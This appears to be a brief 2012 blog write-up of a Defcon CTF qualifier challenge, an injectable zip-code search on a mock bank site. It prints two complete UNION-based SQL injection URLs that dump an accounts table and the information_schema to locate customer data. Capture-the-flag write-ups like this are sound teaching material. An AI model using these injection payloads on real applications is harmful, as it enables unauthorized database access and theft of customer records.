Saturday, June 9, 2012

Defcon CTF Quals 2012: Grab Bag 400

The Grab Bag 400 was a simple SQL Injection vulnerability in zip code based search which we exploited using UNION query.

The following query was executed to enumerate the accounts table:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=11%20UNION%20select%20CAST(id%20as%20text),CAST(id%20as%20text),CAST(id%20as%20text),CAST(account%20as%20text),balance,CAST(id%20as%20text)%20from%20Account

Since there was no name in the accounts table, we enumerated the information schema to find out the name and schema of other tables in the database and found that the user information is stored in the customer table which we enumerated using:

http://140.197.217.85:8080/boa_bank/find_branch.jsp?zip=11%20UNION%20SELECT%20table_name,%20table_schema,%20column_name,%20'1',%20'1',%20'1'%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20'customer'

After enumerating the contents of Customer table, we were unable to find the name 'Jeff Moss' as was required to solve the level but since all the account's balance were 0.00, we ended by scoring using 0.00 as the key. However we later realized we had to look for Dark Tangent, Jeff Moss' alter-ego in the customer database :)

No comments:

Post a Comment